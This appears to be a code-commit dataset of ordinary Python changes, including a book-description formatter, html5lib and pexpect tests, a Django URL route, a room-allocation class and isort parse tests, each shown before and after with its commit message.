text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
template = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return template
Create a new string, instead of modifying the `template`import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
response = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return response
| <commit_before>import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
template = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return template
<commit_msg>Create a new string, instead of modifying the `template`<commit_after>import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
response = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return response
|
eea8b5622ced613cde54e6d09cd98f6483543dfd | tests/test_parser2.py | tests/test_parser2.py | import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
| import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def test_line_counter(self):
# http://groups.google.com/group/html5lib-discuss/browse_frm/thread/f4f00e4a2f26d5c0
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
parser.parse("<pre>\nx\n>\n</pre>")
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
| Add a test case to ensure that this continues to work | Add a test case to ensure that this continues to work
--HG--
extra : convert_revision : svn%3Aacbfec75-9323-0410-a652-858a13e371e0/trunk%40952
| Python | mit | alex/html5lib-python,html5lib/html5lib-python,mgilson/html5lib-python,mindw/html5lib-python,ordbogen/html5lib-python,mgilson/html5lib-python,mindw/html5lib-python,html5lib/html5lib-python,dstufft/html5lib-python,alex/html5lib-python,ordbogen/html5lib-python,mindw/html5lib-python,dstufft/html5lib-python,html5lib/html5lib-python,alex/html5lib-python,mgilson/html5lib-python,gsnedders/html5lib-python,ordbogen/html5lib-python,gsnedders/html5lib-python,dstufft/html5lib-python | import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
Add a test case to ensure that this continues to work
--HG--
extra : convert_revision : svn%3Aacbfec75-9323-0410-a652-858a13e371e0/trunk%40952 | import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def test_line_counter(self):
# http://groups.google.com/group/html5lib-discuss/browse_frm/thread/f4f00e4a2f26d5c0
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
parser.parse("<pre>\nx\n>\n</pre>")
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
| <commit_before>import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
<commit_msg>Add a test case to ensure that this continues to work
--HG--
extra : convert_revision : svn%3Aacbfec75-9323-0410-a652-858a13e371e0/trunk%40952<commit_after> | import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def test_line_counter(self):
# http://groups.google.com/group/html5lib-discuss/browse_frm/thread/f4f00e4a2f26d5c0
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
parser.parse("<pre>\nx\n>\n</pre>")
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
| import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
Add a test case to ensure that this continues to work
--HG--
extra : convert_revision : svn%3Aacbfec75-9323-0410-a652-858a13e371e0/trunk%40952import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def test_line_counter(self):
# http://groups.google.com/group/html5lib-discuss/browse_frm/thread/f4f00e4a2f26d5c0
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
parser.parse("<pre>\nx\n>\n</pre>")
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
| <commit_before>import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
<commit_msg>Add a test case to ensure that this continues to work
--HG--
extra : convert_revision : svn%3Aacbfec75-9323-0410-a652-858a13e371e0/trunk%40952<commit_after>import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def test_line_counter(self):
# http://groups.google.com/group/html5lib-discuss/browse_frm/thread/f4f00e4a2f26d5c0
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
parser.parse("<pre>\nx\n>\n</pre>")
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
|
7d362cfc37398a22440173fa7209224a2542778e | eng100l/ambulances/urls.py | eng100l/ambulances/urls.py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^ambulance_create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
| from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
| Simplify URL for ambulance creation | Simplify URL for ambulance creation
| Python | bsd-3-clause | EMSTrack/WebServerAndClient,EMSTrack/WebServerAndClient,EMSTrack/WebServerAndClient | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^ambulance_create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
Simplify URL for ambulance creation | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
| <commit_before>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^ambulance_create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
<commit_msg>Simplify URL for ambulance creation<commit_after> | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
| from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^ambulance_create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
Simplify URL for ambulance creationfrom django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
| <commit_before>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^ambulance_create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
<commit_msg>Simplify URL for ambulance creation<commit_after>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
|
9fba993ea52df48de8d812c1ad0128d48c8ab4cf | classes/room.py | classes/room.py | class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
else:
return "Room is at full capacity"
| class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
| Add Error statement to add_occupant method for when max capacity is reached | Add Error statement to add_occupant method for when max capacity is reached
| Python | mit | peterpaints/room-allocator | class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
else:
return "Room is at full capacity"
Add Error statement to add_occupant method for when max capacity is reached | class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
| <commit_before>class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
else:
return "Room is at full capacity"
<commit_msg>Add Error statement to add_occupant method for when max capacity is reached<commit_after> | class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
| class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
else:
return "Room is at full capacity"
Add Error statement to add_occupant method for when max capacity is reachedclass Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
| <commit_before>class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
else:
return "Room is at full capacity"
<commit_msg>Add Error statement to add_occupant method for when max capacity is reached<commit_after>class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
|
d9fc2cfdcfaf13f2e8491ace60680f3c94ad5c83 | tests/test_async.py | tests/test_async.py | try:
import asyncio
loop = asyncio.get_event_loop()
except ImportError:
asyncio = None
import pexpect
import unittest
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect('Hello', async=True)
task = asyncio.Task(coro)
results = []
def complete(task):
results.append(task.result())
task.add_done_callback(complete)
loop.run_until_complete(task)
assert results == [0] | try:
import asyncio
except ImportError:
asyncio = None
import pexpect
import unittest
def run(coro):
return asyncio.get_event_loop().run_until_complete(coro)
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect(['Hello', pexpect.EOF] , async=True)
assert run(coro) == 0
print('Done')
def test_timeout(self):
p = pexpect.spawn('cat')
coro = p.expect('foo', timeout=1, async=True)
with self.assertRaises(pexpect.TIMEOUT):
run(coro)
p = pexpect.spawn('cat')
coro = p.expect(['foo', pexpect.TIMEOUT], timeout=1, async=True)
assert run(coro) == 1
def test_eof(self):
p = pexpect.spawn('cat')
p.sendline('Hi')
coro = p.expect(pexpect.EOF, async=True)
p.sendeof()
assert run(coro) == 0
p = pexpect.spawn('cat')
p.sendeof()
coro = p.expect('Blah', async=True)
with self.assertRaises(pexpect.EOF):
run(coro) | Expand tests for async expect | Expand tests for async expect
| Python | isc | dongguangming/pexpect,quatanium/pexpect,crdoconnor/pexpect,Depado/pexpect,crdoconnor/pexpect,dongguangming/pexpect,crdoconnor/pexpect,Wakeupbuddy/pexpect,nodish/pexpect,Wakeupbuddy/pexpect,blink1073/pexpect,nodish/pexpect,quatanium/pexpect,bangi123/pexpect,dongguangming/pexpect,bangi123/pexpect,quatanium/pexpect,Depado/pexpect,Wakeupbuddy/pexpect,blink1073/pexpect,dongguangming/pexpect,Wakeupbuddy/pexpect,nodish/pexpect,Depado/pexpect,blink1073/pexpect,bangi123/pexpect,Depado/pexpect,bangi123/pexpect | try:
import asyncio
loop = asyncio.get_event_loop()
except ImportError:
asyncio = None
import pexpect
import unittest
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect('Hello', async=True)
task = asyncio.Task(coro)
results = []
def complete(task):
results.append(task.result())
task.add_done_callback(complete)
loop.run_until_complete(task)
assert results == [0]Expand tests for async expect | try:
import asyncio
except ImportError:
asyncio = None
import pexpect
import unittest
def run(coro):
return asyncio.get_event_loop().run_until_complete(coro)
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect(['Hello', pexpect.EOF] , async=True)
assert run(coro) == 0
print('Done')
def test_timeout(self):
p = pexpect.spawn('cat')
coro = p.expect('foo', timeout=1, async=True)
with self.assertRaises(pexpect.TIMEOUT):
run(coro)
p = pexpect.spawn('cat')
coro = p.expect(['foo', pexpect.TIMEOUT], timeout=1, async=True)
assert run(coro) == 1
def test_eof(self):
p = pexpect.spawn('cat')
p.sendline('Hi')
coro = p.expect(pexpect.EOF, async=True)
p.sendeof()
assert run(coro) == 0
p = pexpect.spawn('cat')
p.sendeof()
coro = p.expect('Blah', async=True)
with self.assertRaises(pexpect.EOF):
run(coro) | <commit_before>try:
import asyncio
loop = asyncio.get_event_loop()
except ImportError:
asyncio = None
import pexpect
import unittest
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect('Hello', async=True)
task = asyncio.Task(coro)
results = []
def complete(task):
results.append(task.result())
task.add_done_callback(complete)
loop.run_until_complete(task)
assert results == [0]<commit_msg>Expand tests for async expect<commit_after> | try:
import asyncio
except ImportError:
asyncio = None
import pexpect
import unittest
def run(coro):
return asyncio.get_event_loop().run_until_complete(coro)
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect(['Hello', pexpect.EOF] , async=True)
assert run(coro) == 0
print('Done')
def test_timeout(self):
p = pexpect.spawn('cat')
coro = p.expect('foo', timeout=1, async=True)
with self.assertRaises(pexpect.TIMEOUT):
run(coro)
p = pexpect.spawn('cat')
coro = p.expect(['foo', pexpect.TIMEOUT], timeout=1, async=True)
assert run(coro) == 1
def test_eof(self):
p = pexpect.spawn('cat')
p.sendline('Hi')
coro = p.expect(pexpect.EOF, async=True)
p.sendeof()
assert run(coro) == 0
p = pexpect.spawn('cat')
p.sendeof()
coro = p.expect('Blah', async=True)
with self.assertRaises(pexpect.EOF):
run(coro) | try:
import asyncio
loop = asyncio.get_event_loop()
except ImportError:
asyncio = None
import pexpect
import unittest
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect('Hello', async=True)
task = asyncio.Task(coro)
results = []
def complete(task):
results.append(task.result())
task.add_done_callback(complete)
loop.run_until_complete(task)
assert results == [0]Expand tests for async expecttry:
import asyncio
except ImportError:
asyncio = None
import pexpect
import unittest
def run(coro):
return asyncio.get_event_loop().run_until_complete(coro)
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect(['Hello', pexpect.EOF] , async=True)
assert run(coro) == 0
print('Done')
def test_timeout(self):
p = pexpect.spawn('cat')
coro = p.expect('foo', timeout=1, async=True)
with self.assertRaises(pexpect.TIMEOUT):
run(coro)
p = pexpect.spawn('cat')
coro = p.expect(['foo', pexpect.TIMEOUT], timeout=1, async=True)
assert run(coro) == 1
def test_eof(self):
p = pexpect.spawn('cat')
p.sendline('Hi')
coro = p.expect(pexpect.EOF, async=True)
p.sendeof()
assert run(coro) == 0
p = pexpect.spawn('cat')
p.sendeof()
coro = p.expect('Blah', async=True)
with self.assertRaises(pexpect.EOF):
run(coro) | <commit_before>try:
import asyncio
loop = asyncio.get_event_loop()
except ImportError:
asyncio = None
import pexpect
import unittest
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect('Hello', async=True)
task = asyncio.Task(coro)
results = []
def complete(task):
results.append(task.result())
task.add_done_callback(complete)
loop.run_until_complete(task)
assert results == [0]<commit_msg>Expand tests for async expect<commit_after>try:
import asyncio
except ImportError:
asyncio = None
import pexpect
import unittest
def run(coro):
return asyncio.get_event_loop().run_until_complete(coro)
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect(['Hello', pexpect.EOF] , async=True)
assert run(coro) == 0
print('Done')
def test_timeout(self):
p = pexpect.spawn('cat')
coro = p.expect('foo', timeout=1, async=True)
with self.assertRaises(pexpect.TIMEOUT):
run(coro)
p = pexpect.spawn('cat')
coro = p.expect(['foo', pexpect.TIMEOUT], timeout=1, async=True)
assert run(coro) == 1
def test_eof(self):
p = pexpect.spawn('cat')
p.sendline('Hi')
coro = p.expect(pexpect.EOF, async=True)
p.sendeof()
assert run(coro) == 0
p = pexpect.spawn('cat')
p.sendeof()
coro = p.expect('Blah', async=True)
with self.assertRaises(pexpect.EOF):
run(coro) |
aaac1ae0667dabe6fd038c9f5a42c157b9457ef1 | tests/test_parse.py | tests/test_parse.py | from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import default
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=default)
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
| from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import Config
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=Config())
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
| Fix use of default config to match new refactor | Fix use of default config to match new refactor
| Python | mit | PyCQA/isort,PyCQA/isort | from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import default
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=default)
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
Fix use of default config to match new refactor | from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import Config
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=Config())
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
| <commit_before>from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import default
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=default)
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
<commit_msg>Fix use of default config to match new refactor<commit_after> | from hypothesis_auto import auto_pytest_magic
